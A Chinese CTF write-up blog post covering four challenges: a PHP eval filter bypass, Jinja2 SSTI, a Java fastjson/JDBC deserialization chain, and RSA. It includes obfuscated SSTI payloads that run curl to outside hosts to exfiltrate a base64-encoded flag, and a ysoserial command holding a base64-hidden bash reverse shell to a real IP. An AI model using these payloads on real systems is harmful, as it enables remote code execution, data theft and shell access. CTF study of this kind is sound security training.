某次内部赛

ezrce

<?php
highlight_file(__FILE__);
//its a babe bypass
error_reporting(0);
if (isset($_GET['rce'])) {
  if (!empty($_GET['rce'])){
    $printValue= strtolower($_GET['rce']);
    $banned = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "test";
    $$special_block= "/flag";
    foreach ($banned as $value) {
      if (strpos($printValue, $value) || preg_match('/system|exec|bin2hex|assert|passthru|shell_exec|escapeshellcmd| escapeshellarg|pcntl_exec|usort|popen|flag|special_block|require|scandir|include|hex2bin|getallheaders|strrev|getallheaders|strrev|\\$[a-zA-Z]|[#!%^&*_+=\\-,\\.:`|<>?~\\\\\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>

离谱的bypass

国外的一道原题

https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse

非常巧妙的利用了变量覆盖的方法

echo+'';print(eval('return ${banned}[4](${test});'))

image-20211125110034199

babyssti

看下过滤(当然不止)

https://saucer-man.com/information_security/516.html#cl-6

{{
[
空格
'
.
{% if ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:4444/?i=`whoami`').read()=='p' %}1{% endif %}


http://127.0.0.1:5000/?name={{()|attr(%22__class__%22)|attr(%22__base__%22)|attr(%22__subclasses__%22)()|attr(%22__getitem__%22)(133)|attr(%22__init__%22)|attr(%22__globals__%22)|attr(%22__getitem__%22)(%22popen%22)(%22whoami%22)|attr(%22read%22)()}}


{{()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("whoami")|attr(%22read%22)()}}


{% if ()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("curl http://boxtkv.ceye.io")|attr(%22read%22)()=="p" %}1{% endif %}

{%if()|attr(%22%c%c%c%c%c%c%c%c%c%22|format(95,95,99,108,97,115,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,98,97,115,101,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(132)|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,105,110,105,116,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,108,111,98,97,108,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(%22popen%22)(%22curl$IFS$9http://794828630:2333?c=`cat$IFS$9/fla""gasdcccccc|base64`%22)|attr(%22read%22)()=="p"%}1{%endif%}

过滤了蛮多的,重要的是需要自己搭个环境

image-20211119105045508

flask环境和python脚本环境完全不一样的,主要卡在这里了

image-20211119105020451

easy_java

把jar包还原成项目

本地搭建,审计

image-20211206152458771

在admin路由这里可以自定义jdbc的参数,而jdbc存在反序列化

第一步,admin伪造绕过

在register路由这里

image-20211206152649150

只要匹配到{username},就会替换

https://wx.zsxq.com/dweb2/index/topic_detail/182585211588122

而p神的知识星球说明了fastjson支持注释,利用注释饶过正则匹配

http://127.0.0.1/register?user=%7B%22username%22%3A%2F*penson*%2F%22admin%22%2C%22password%22%3A%22guess%22%7D

把admin注进去

image-20211206163111319

登录拿session进admin

接着就是jdbc反序列化

看到jdbc版本是8的

image-20211206163356471

https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/

image-20211206164203944

jdbc:mysql://47.96.31.86:7700/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor


java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}

easy_rsa

羊城杯的原题

[羊城杯 2020]Power

抄脚本改一下

import sympy
import gmpy2
from Crypto.Util.number import getPrime , long_to_bytes

x = 4081589335861545789835900064099635357096399307337433897589803884626402434977432990016139226375481290410727489054239869962196583881117103323966736211566475539446678319618093115175112507069500173061215448325773249332796885624377362206444530510862480133054015065963334293387568286441905700716121965839808869357354006128877042545439515369257271569914721144973246451659098340370835404858757446411467741537214371880806558890311566169561294743201198192296369009590146133590
c=25562696992733536309182393779981779194240154099429561071032280334763645594896471389578060860342401623942484948987716140390982592619521666792424752334479246961649746061040166020085170757237115563084113762532741403917411315342519136738879919867100264184573200481028092895743894796816962164203221470918044930335749213176218455777516922130048195365976773635904361747281900075574599122502341481491609282116651135302435182241327211649334973233884028113185901584769019028117675925853042867198133957188908318016744666365319241377018102421574351449756122789387653293735302629918910002538784361049010374950779639892697081213057
dp=5260952459703133229911581653786151165351615592380635657675026312493642098695058018540694433892583077117305420684484097529438374197142471836138466810277803
p = sympy.symbols("p")
a = sympy.solve([2021*p**3 + 2020 + 2019*p**2-x],[p])
# print(a)
p=12640211216466775763050017481547933750912814131973813802729339716313957628118122130773233534260300514170797571411776745968647678621480594520108761936619731

m = pow(c,dp,p)
print(long_to_bytes(m))

文章作者: penson
文章链接: https://www.penson.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 penson !
评论
  目录

梨花香-霜雪千年